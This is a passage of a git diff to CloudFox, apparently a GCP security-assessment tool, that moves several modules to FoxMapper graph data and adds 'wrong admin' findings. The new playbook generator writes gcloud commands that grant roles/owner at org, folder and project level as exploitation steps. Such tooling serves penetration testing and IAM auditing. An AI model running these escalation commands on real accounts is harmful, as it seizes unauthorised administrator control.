capability for display +func SortNodesByPrivesc(nodes []*foxmapperservice.Node) { + sort.Slice(nodes, func(i, j int) bool { + // Admins first + if nodes[i].IsAdmin && !nodes[j].IsAdmin { + return true + } + if !nodes[i].IsAdmin && nodes[j].IsAdmin { + return false + } + // Then by admin level (org > folder > project) + levelOrder := map[string]int{"org": 0, "folder": 1, "project": 2, "": 3} + if nodes[i].AdminLevel != nodes[j].AdminLevel { + return levelOrder[nodes[i].AdminLevel] < levelOrder[nodes[j].AdminLevel] + } + // Then by email + return nodes[i].Email < nodes[j].Email + }) +} diff --git a/gcp/commands/functions.go b/gcp/commands/functions.go index 385a104f..d97a0e77 100644 --- a/gcp/commands/functions.go +++ b/gcp/commands/functions.go @@ -61,7 +61,7 @@ type FunctionsModule struct { // Module-specific fields - per-project for hierarchical output ProjectFunctions map[string][]FunctionsService.FunctionInfo // projectID -> functions LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -98,17 +98,10 @@ func runGCPFunctionsCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *FunctionsModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_FUNCTIONS_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_FUNCTIONS_MODULE_NAME) } m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_FUNCTIONS_MODULE_NAME, m.processProject) @@ -559,12 +552,10 @@ func (m *FunctionsModule) functionsToTableBody(functions []FunctionsService.Func // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if serviceAccount != "-" { - attackPaths = m.AttackPathCache.GetAttackSummary(serviceAccount) - } else { - attackPaths = "No" - } + if serviceAccount != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, serviceAccount) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" } // Format ingress for display (consistent with Cloud Run) diff --git a/gcp/commands/gke.go b/gcp/commands/gke.go index c18d7d35..58a216f4 100644 --- a/gcp/commands/gke.go +++ b/gcp/commands/gke.go @@ -63,7 +63,7 @@ type GKEModule struct { ProjectClusters map[string][]GKEService.ClusterInfo // projectID -> clusters ProjectNodePools map[string][]GKEService.NodePoolInfo // projectID -> node pools LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -101,17 +101,10 @@ func runGCPGKECommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_GKE_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_GKE_MODULE_NAME) } m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) @@ -399,12 +392,10 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod // Check attack paths (privesc/exfil/lateral) for the service account attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if saDisplay != "-" { - attackPaths = m.AttackPathCache.GetAttackSummary(saDisplay) - } else { - attackPaths = "No" - } + if saDisplay != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saDisplay) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" } // Format actual scopes for display diff --git a/gcp/commands/hiddenadmins.go b/gcp/commands/hiddenadmins.go index aeb29bbb..7c73cf3a 100644 --- a/gcp/commands/hiddenadmins.go +++ b/gcp/commands/hiddenadmins.go @@ -9,6 +9,7 @@ import ( iampb "cloud.google.com/go/iam/apiv1/iampb" resourcemanager "cloud.google.com/go/resourcemanager/apiv3" resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" + foxmapperservice "github.com/BishopFox/cloudfox/gcp/services/foxmapperService" "github.com/BishopFox/cloudfox/globals" "github.com/BishopFox/cloudfox/internal" gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" @@ -85,6 +86,10 @@ type HiddenAdminsModule struct { ProjectAdmins map[string][]HiddenAdmin // projectID -> admins ResourceAdmins []HiddenAdmin + // FoxMapper-based wrong admins + WrongAdmins []foxmapperservice.WrongAdminFinding + FoxMapperCache *gcpinternal.FoxMapperCache + OrgIDs []string OrgNames map[string]string FolderNames map[string]string @@ -163,6 +168,25 @@ func GetIAMModificationPermissions() []IAMModificationPermission { func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Analyzing IAM policies to identify hidden admins...", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + // Try to load FoxMapper data for wrongadmin analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache == nil || !m.FoxMapperCache.IsPopulated() { + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + m.FoxMapperCache = gcpinternal.TryLoadFoxMapper(orgID, m.ProjectIDs) + } + + // Use FoxMapper wrongadmin analysis if available + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + svc := m.FoxMapperCache.GetService() + m.WrongAdmins = svc.AnalyzeWrongAdmins() + if len(m.WrongAdmins) > 0 { + logger.InfoM(fmt.Sprintf("FoxMapper found %d 'wrong admins' (admins without explicit roles/owner)", len(m.WrongAdmins)), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + } + // Build permission map permMap := make(map[string]IAMModificationPermission) for _, p := range GetIAMModificationPermissions() { @@ -183,7 +207,7 @@ func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger // Generate loot (playbook) m.generateLoot() - if len(m.AllAdmins) == 0 { + if len(m.AllAdmins) == 0 && len(m.WrongAdmins) == 0 { logger.InfoM("No hidden admins found", globals.GCP_HIDDEN_ADMINS_MODULE_NAME) return } @@ -197,8 +221,29 @@ func (m *HiddenAdminsModule) Execute(ctx context.Context, logger internal.Logger } resourceCount := len(m.ResourceAdmins) - logger.SuccessM(fmt.Sprintf("Found %d hidden admin(s): %d org-level, %d folder-level, %d project-level, %d resource-level", - len(m.AllAdmins), orgCount, folderCount, projectCount, resourceCount), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + if len(m.AllAdmins) > 0 { + logger.SuccessM(fmt.Sprintf("Found %d hidden admin(s) with IAM modification permissions: %d org-level, %d folder-level, %d project-level, %d resource-level", + len(m.AllAdmins), orgCount, folderCount, projectCount, resourceCount), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } + + if len(m.WrongAdmins) > 0 { + // Count by admin level + orgWrong := 0 + folderWrong := 0 + projectWrong := 0 + for _, wa := range m.WrongAdmins { + switch wa.AdminLevel { + case "org": + orgWrong++ + case "folder": + folderWrong++ + default: + projectWrong++ + } + } + logger.SuccessM(fmt.Sprintf("Found %d 'wrong admins' (FoxMapper): %d org-level, %d folder-level, %d project-level", + len(m.WrongAdmins), orgWrong, folderWrong, projectWrong), globals.GCP_HIDDEN_ADMINS_MODULE_NAME) + } m.writeOutput(ctx, logger) } @@ -486,15 +531,111 @@ func (m *HiddenAdminsModule) addAdminToLoot(admin HiddenAdmin) { } func (m *HiddenAdminsModule) generatePlaybook() { - m.LootMap["hidden-admins-playbook"] = &internal.LootFile{ - Name: "hidden-admins-playbook", - Contents: `# GCP Hidden Admins Exploitation Playbook + var content strings.Builder + content.WriteString(`# GCP Hidden Admins Exploitation Playbook # Generated by CloudFox # # This playbook provides exploitation techniques for principals with IAM modification capabilities. -` + m.generatePlaybookSections(), +`) + + // Add wrong admins section if FoxMapper data is available + if len(m.WrongAdmins) > 0 { + content.WriteString(m.generateWrongAdminsSection()) + } + + // Add IAM modification section + content.WriteString(m.generatePlaybookSections()) + + m.LootMap["hidden-admins-playbook"] = &internal.LootFile{ + Name: "hidden-admins-playbook", + Contents: content.String(), + } +} + +func (m *HiddenAdminsModule) generateWrongAdminsSection() string { + var sb strings.Builder + + sb.WriteString("## Wrong Admins (FoxMapper Analysis)\n\n") + sb.WriteString("These principals are marked as admin in the IAM graph but don't have explicit admin roles (roles/owner).\n") + sb.WriteString("Instead, they have self-assignment capabilities (can grant themselves roles/owner).\n\n") + sb.WriteString("**Why this matters:** These principals are effectively admin but may not appear in standard admin audits.\n") + sb.WriteString("They can escalate to full admin access at any time by modifying IAM policies.\n\n") + + // Group by admin level + orgWrong := []foxmapperservice.WrongAdminFinding{} + folderWrong := []foxmapperservice.WrongAdminFinding{} + projectWrong := []foxmapperservice.WrongAdminFinding{} + + for _, wa := range m.WrongAdmins { + switch wa.AdminLevel { + case "org": + orgWrong = append(orgWrong, wa) + case "folder": + folderWrong = append(folderWrong, wa) + default: + projectWrong = append(projectWrong, wa) + } + } + + if len(orgWrong) > 0 { + sb.WriteString("### CRITICAL: Organization-Level Wrong Admins\n\n") + for _, wa := range orgWrong { + sb.WriteString(fmt.Sprintf("**%s** [%s]\n", wa.Principal, wa.MemberType)) + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + sb.WriteString("\n```bash\n") + sb.WriteString("# This principal can grant themselves org-level owner:\n") + sb.WriteString(fmt.Sprintf("gcloud organizations add-iam-policy-binding ORG_ID \\\n")) + sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) + sb.WriteString(" --role='roles/owner'\n") + sb.WriteString("```\n\n") + } + } + + if len(folderWrong) > 0 { + sb.WriteString("### HIGH: Folder-Level Wrong Admins\n\n") + for _, wa := range folderWrong { + sb.WriteString(fmt.Sprintf("**%s** [%s]\n", wa.Principal, wa.MemberType)) + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + sb.WriteString("\n```bash\n") + sb.WriteString("# This principal can grant themselves folder-level owner:\n") + sb.WriteString(fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding FOLDER_ID \\\n")) + sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) + sb.WriteString(" --role='roles/owner'\n") + sb.WriteString("```\n\n") + } + } + + if len(projectWrong) > 0 { + sb.WriteString("### MEDIUM: Project-Level Wrong Admins\n\n") + for _, wa := range projectWrong { + sb.WriteString(fmt.Sprintf("**%s** [%s]", wa.Principal, wa.MemberType)) + if wa.ProjectID != "" { + sb.WriteString(fmt.Sprintf(" in %s", wa.ProjectID)) + } + sb.WriteString("\n") + for _, reason := range wa.Reasons { + sb.WriteString(fmt.Sprintf(" - %s\n", reason)) + } + projectID := wa.ProjectID + if projectID == "" { + projectID = "PROJECT_ID" + } + sb.WriteString("\n```bash\n") + sb.WriteString("# This principal can grant themselves project-level owner:\n") + sb.WriteString(fmt.Sprintf("gcloud projects add-iam-policy-binding %s \\\n", projectID)) + sb.WriteString(fmt.Sprintf(" --member='%s:%s' \\\n", wa.MemberType, wa.Principal)) + sb.WriteString(" --role='roles/owner'\n") + sb.WriteString("```\n\n") + } } + + sb.WriteString("---\n\n") + return sb.String() } func (m *HiddenAdminsModule) generatePlaybookSections() string { @@ -742,16 +883,61 @@ func (m *HiddenAdminsModule) buildTablesForProject(projectID string) []internal. } func (m *HiddenAdminsModule) buildAllTables() []internal.TableFile { - if len(m.AllAdmins) == 0 { - return nil - } - return []internal.TableFile{ - { + var tables []internal.TableFile + + if len(m.AllAdmins) > 0 { + tables = append(tables, internal.TableFile{ Name: "hidden-admins", Header: m.getHeader(), Body: m.adminsToTableBody(m.AllAdmins), - }, + }) + } + + // Add wrong admins table if FoxMapper data is available + if len(m.WrongAdmins) > 0 { + tables = append(tables, internal.TableFile{ + Name: "wrong-admins", + Header: m.getWrongAdminsHeader(), + Body: m.wrongAdminsToTableBody(), + }) } + + return tables +} + +func (m *HiddenAdminsModule) getWrongAdminsHeader() []string { + return []string{ + "Principal", + "Type", + "Admin Level", + "Project", + "Reasons", + } +} + +func (m *HiddenAdminsModule) wrongAdminsToTableBody() [][]string { + var body [][]string + for _, wa := range m.WrongAdmins { + // Combine reasons into a single string + reasonsStr := strings.Join(wa.Reasons, "; ") + if len(reasonsStr) > 100 { + reasonsStr = reasonsStr[:97] + "..." + } + + projectID := wa.ProjectID + if projectID == "" { + projectID = "-" + } + + body = append(body, []string{ + wa.Principal, + wa.MemberType, + wa.AdminLevel, + projectID, + reasonsStr, + }) + } + return body } func (m *HiddenAdminsModule) collectLootFiles() []internal.LootFile { diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index abce5a8f..b918e5d9 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -91,7 +91,7 @@ type IAMModule struct { Groups []IAMService.GroupInfo MFAStatus map[string]*IAMService.MFAStatus LootMap map[string]*internal.LootFile - AttackPathCache *gcpinternal.AttackPathCache + FoxMapperCache *gcpinternal.FoxMapperCache mu sync.Mutex // Member to groups mapping (email -> list of group emails) @@ -148,17 +148,10 @@ func runGCPIAMCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_IAM_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Get FoxMapper cache for graph-based analysis + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_IAM_MODULE_NAME) } logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) @@ -686,11 +679,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { // Check attack paths for service account principals attackPaths := "-" if sb.MemberType == "ServiceAccount" { - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(sb.MemberEmail) - } else { - attackPaths = "run --attack-paths" - } + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) } body = append(body, []string{ @@ -730,12 +719,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { } // Check attack paths for this service account - attackPaths := "-" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) - } else { - attackPaths = "run --attack-paths" - } + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) body = append(body, []string{ "project", @@ -912,11 +896,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile // Check attack paths for service account principals attackPaths := "-" if sb.MemberType == "ServiceAccount" { - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(sb.MemberEmail) - } else { - attackPaths = "run --attack-paths" - } + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sb.MemberEmail) } body = append(body, []string{ @@ -959,12 +939,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile } // Check attack paths for this service account - attackPaths := "-" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) - } else { - attackPaths = "run --attack-paths" - } + attackPaths := gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, sa.Email) body = append(body, []string{ "project", diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 157dccbf..07e7353b 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -58,7 +58,7 @@ type InstancesModule struct { ProjectInstances map[string][]ComputeEngineService.ComputeEngineInfo // projectID -> instances ProjectMetadata map[string]*ComputeEngineService.ProjectMetadataInfo // projectID -> metadata LootMap map[string]map[string]*internal.LootFile // projectID -> loot files - AttackPathCache *gcpinternal.AttackPathCache // Cached attack path analysis results + FoxMapperCache *gcpinternal.FoxMapperCache // FoxMapper graph data (preferred) mu sync.Mutex } @@ -99,17 +99,10 @@ func runGCPInstancesCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { - // Get attack path cache from context (populated by all-checks or attack path analysis) - m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) - - // If no context cache, try loading from disk cache - if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { - diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) - if err == nil && diskCache != nil && diskCache.IsPopulated() { - logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", - metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_INSTANCES_MODULE_NAME) - m.AttackPathCache = diskCache - } + // Try to get FoxMapper cache (preferred - graph-based analysis) + m.FoxMapperCache = gcpinternal.GetFoxMapperCacheFromContext(ctx) + if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + logger.InfoM("Using FoxMapper graph data for attack path analysis", globals.GCP_INSTANCES_MODULE_NAME) } // Run enumeration with concurrency @@ -679,43 +672,116 @@ func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.L } // getInstancesTableHeader returns the instances table header +// Columns are grouped logically: +// - Identity: Project, Name, Type, Zone, State, Machine Type +// - Network: External IP, Internal IP, IP Forward +// - Service Account: Service Account, SA Attack Paths, Scopes, Default SA, Broad Scopes +// - Access Control: OS Login, OS Login 2FA, Block Proj Keys, Serial Port +// - Protection: Delete Protect, Last Snapshot +// - Hardware Security: Shielded VM, Secure Boot, vTPM, Integrity, Confidential +// - Disk Encryption: Encryption, KMS Key +// - IAM: IAM Binding Role, IAM Binding Principal func (m *InstancesModule) getInstancesTableHeader() []string { return []string{ - "Project Name", - "Project ID", + // Identity + "Project", "Name", + "Type", "Zone", "State", "Machine Type", + // Network "External IP", "Internal IP", + "IP Forward", + // Service Account "Service Account", "SA Attack Paths", "Scopes", "Default SA", "Broad Scopes", + // Access Control "OS Login", "OS Login 2FA", "Block Proj Keys", "Serial Port", - "IP Forward", + // Protection + "Delete Protect", + "Last Snapshot", + // Hardware Security "Shielded VM", "Secure Boot", "vTPM", "Integrity", "Confidential", + // Disk Encryption "Encryption", "KMS Key", + // IAM "IAM Binding Role", "IAM Binding Principal", } } +// isManagedInstance returns true if the instance is managed by a GCP service (GKE, Dataproc, etc.) +func isManagedInstance(instanceType ComputeEngineService.InstanceType) bool { + switch instanceType { + case ComputeEngineService.InstanceTypeGKE, + ComputeEngineService.InstanceTypeMIG, + ComputeEngineService.InstanceTypeDataproc, + ComputeEngineService.InstanceTypeDataflow, + ComputeEngineService.InstanceTypeComposer, + ComputeEngineService.InstanceTypeBatchJob, + ComputeEngineService.InstanceTypeAppEngine: + return true + default: + return false + } +} + +// formatManagedBool formats a boolean value with context for managed instances +// For managed instances, values that match expected behavior are annotated with (TYPE) to indicate this is expected +// Example: Delete Protection "No" on a GKE node shows "No (GKE)" because GKE nodes are ephemeral +func formatManagedBool(value bool, instanceType ComputeEngineService.InstanceType, expectedForManaged bool) string { + if !isManagedInstance(instanceType) { + return shared.BoolToYesNo(value) + } + + // For managed instances, add context when the value matches expected behavior + // This indicates "this looks like a finding but it's expected for this instance type" + shortType := string(instanceType) + if value == expectedForManaged { + if value { + return fmt.Sprintf("Yes (%s)", shortType) + } + return fmt.Sprintf("No (%s)", shortType) + } + + // Value differs from expected - no annotation needed + return shared.BoolToYesNo(value) +} + +// formatManagedSnapshot formats the last snapshot date with context for managed instances +func formatManagedSnapshot(lastSnapshot string, instanceType ComputeEngineService.InstanceType) string { + // For ephemeral/managed instances, "Never" is expected + if lastSnapshot == "" || lastSnapshot == "Never" { + if isManagedInstance(instanceType) { + return fmt.Sprintf("Never (%s)", string(instanceType)) + } + return "Never" + } + + // Truncate to just the date portion if it's a full timestamp + if len(lastSnapshot) > 10 { + lastSnapshot = lastSnapshot[:10] + } + return lastSnapshot +} + // getSensitiveMetadataTableHeader returns the sensitive metadata table header func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Source", "Zone", "Metadata Key", @@ -728,8 +794,7 @@ func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { // getSSHKeysTableHeader returns the SSH keys table header func (m *InstancesModule) getSSHKeysTableHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Source", "Zone", "SSH Key", @@ -745,7 +810,6 @@ func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instance for _, key := range meta.ProjectSSHKeys { body = append(body, []string{ m.GetProjectName(projectID), - projectID, "PROJECT", "-", truncateSSHKeyMiddle(key, 100), @@ -759,7 +823,6 @@ func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instance for _, key := range instance.SSHKeys { body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.Zone, truncateSSHKeyMiddle(key, 100), @@ -800,13 +863,12 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. } // Check attack paths (privesc/exfil/lateral) for the service account + // FoxMapper takes priority if available (graph-based analysis) attackPaths := "run --attack-paths" - if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { - if saEmail != "-" { - attackPaths = m.AttackPathCache.GetAttackSummary(saEmail) - } else { - attackPaths = "No" - } + if saEmail != "-" { + attackPaths = gcpinternal.GetAttackSummaryFromCaches(m.FoxMapperCache, nil, saEmail) + } else if m.FoxMapperCache != nil && m.FoxMapperCache.IsPopulated() { + attackPaths = "No SA" } // External IP display @@ -827,31 +889,50 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. kmsKey = "-" } + // Instance type for contextual display + instType := instance.InstanceType + if instType == "" { + instType = ComputeEngineService.InstanceTypeStandalone + } + // Base row data (reused for each IAM binding) + // Order matches header groups: Identity, Network, Service Account, Access Control, Protection, Hardware Security, Disk Encryption baseRow := []string{ + // Identity m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, + string(instType), instance.Zone, instance.State, instance.MachineType, + // Network externalIP, instance.InternalIP, + shared.BoolToYesNo(instance.CanIPForward), + // Service Account saEmail, attackPaths, scopes, - shared.BoolToYesNo(instance.HasDefaultSA), - shared.BoolToYesNo(instance.HasCloudScopes), + // Default SA is expected for GKE/managed instances + formatManagedBool(instance.HasDefaultSA, instType, true), + // Broad scopes are expected for GKE/managed instances + formatManagedBool(instance.HasCloudScopes, instType, true), + // Access Control shared.BoolToYesNo(instance.OSLoginEnabled), shared.BoolToYesNo(instance.OSLogin2FAEnabled), shared.BoolToYesNo(instance.BlockProjectSSHKeys), shared.BoolToYesNo(instance.SerialPortEnabled), - shared.BoolToYesNo(instance.CanIPForward), + // Protection - Delete protection is NOT expected for managed instances (they're ephemeral) + formatManagedBool(instance.DeletionProtection, instType, false), + // Snapshots are not expected for ephemeral/managed instances + formatManagedSnapshot(instance.LastSnapshotDate, instType), + // Hardware Security shared.BoolToYesNo(instance.ShieldedVM), shared.BoolToYesNo(instance.SecureBoot), shared.BoolToYesNo(instance.VTPMEnabled), shared.BoolToYesNo(instance.IntegrityMonitoring), shared.BoolToYesNo(instance.ConfidentialVM), + // Disk Encryption encryption, kmsKey, } @@ -886,7 +967,6 @@ func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string for _, item := range meta.SensitiveMetadata { body = append(body, []string{ m.GetProjectName(projectID), - projectID, "PROJECT", "-", item.MetadataKey, @@ -903,7 +983,6 @@ func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string for _, item := range instance.SensitiveMetadata { body = append(body, []string{ m.GetProjectName(instance.ProjectID), - instance.ProjectID, instance.Name, instance.Zone, item.MetadataKey, diff --git a/gcp/commands/inventory.go b/gcp/commands/inventory.go index 36b16f9f..f88f0701 100644 --- a/gcp/commands/inventory.go +++ b/gcp/commands/inventory.go @@ -111,11 +111,11 @@ type AssetTypeSummary struct { type InventoryModule struct { gcpinternal.BaseGCPModule - // Resource tracking (from dedicated enumeration) - resourceCounts map[string]map[string]int // resourceType -> region -> count - resourceIDs map[string]map[string][]string // resourceType -> region -> []resourceID - regions map[string]bool // Track all regions with resources - mu sync.Mutex + // Resource tracking (from dedicated enumeration) - NOW PER PROJECT + projectResourceCounts map[string]map[string]map[string]int // projectID -> resourceType -> region -> count + projectResourceIDs map[string]map[string]map[string][]string // projectID -> resourceType -> region -> []resourceID + projectRegions map[string]map[string]bool // projectID -> regions with resources + mu sync.Mutex // Asset Inventory tracking (complete coverage) assetCounts map[string]map[string]int // projectID -> assetType -> count @@ -125,10 +125,13 @@ type InventoryModule struct { // Service Usage tracking (fallback when Asset API not available) enabledServices map[string][]string // projectID -> list of enabled services - // Totals - totalByType map[string]int - totalByRegion map[string]int - grandTotal int + // Totals (per project) + projectTotalByType map[string]map[string]int // projectID -> resourceType -> count + projectTotalByRegion map[string]map[string]int // projectID -> region -> count + projectGrandTotal map[string]int // projectID -> total count + + // Global totals + grandTotal int // Asset totals assetGrandTotal int @@ -150,14 +153,15 @@ func runGCPInventoryCommand(cmd *cobra.Command, args []string) { } module := &InventoryModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - resourceCounts: make(map[string]map[string]int), - resourceIDs: make(map[string]map[string][]string), - regions: make(map[string]bool), - totalByType: make(map[string]int), - totalByRegion: make(map[string]int), - assetCounts: make(map[string]map[string]int), - enabledServices: make(map[string][]string), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + projectResourceCounts: make(map[string]map[string]map[string]int), + projectResourceIDs: make(map[string]map[string]map[string][]string), + projectRegions: make(map[string]map[string]bool), + projectTotalByType: make(map[string]map[string]int), + projectTotalByRegion: make(map[string]map[string]int), + projectGrandTotal: make(map[string]int), + assetCounts: make(map[string]map[string]int), + enabledServices: make(map[string][]string), } module.Execute(cmdCtx.Ctx, cmdCtx.Logger) @@ -166,8 +170,10 @@ func runGCPInventoryCommand(cmd *cobra.Command, args []string) { func (m *InventoryModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Starting resource inventory enumeration...", GCP_INVENTORY_MODULE_NAME) - // Initialize resource type maps - m.initializeResourceTypes() + // Initialize resource type maps for each project + for _, projectID := range m.ProjectIDs { + m.initializeResourceTypesForProject(projectID) + } // First, get complete asset counts from Cloud Asset Inventory API // This provides comprehensive coverage of ALL resources @@ -206,69 +212,27 @@ func (m *InventoryModule) Execute(ctx context.Context, logger internal.Logger) { logger.SuccessM(fmt.Sprintf("Service Usage API: %d enabled services detected (may contain resources CloudFox doesn't enumerate)", totalServices), GCP_INVENTORY_MODULE_NAME) } - logger.SuccessM(fmt.Sprintf("CloudFox enumeration: %d resources across %d types (with security metadata)", - m.grandTotal, len(m.totalByType)), GCP_INVENTORY_MODULE_NAME) + logger.SuccessM(fmt.Sprintf("CloudFox enumeration: %d resources across %d project(s) (with security metadata)", + m.grandTotal, len(m.projectGrandTotal)), GCP_INVENTORY_MODULE_NAME) // Write output m.writeOutput(ctx, logger) } -// initializeResourceTypes sets up the resource type maps -func (m *InventoryModule) initializeResourceTypes() { - resourceTypes := []string{ - // Compute - "Compute Instances", - "Compute Disks", - "Compute Snapshots", - "Compute Images", - // Containers - "GKE Clusters", - "Cloud Run Services", - "Cloud Run Jobs", - // Serverless - "Cloud Functions", - "Composer Environments", 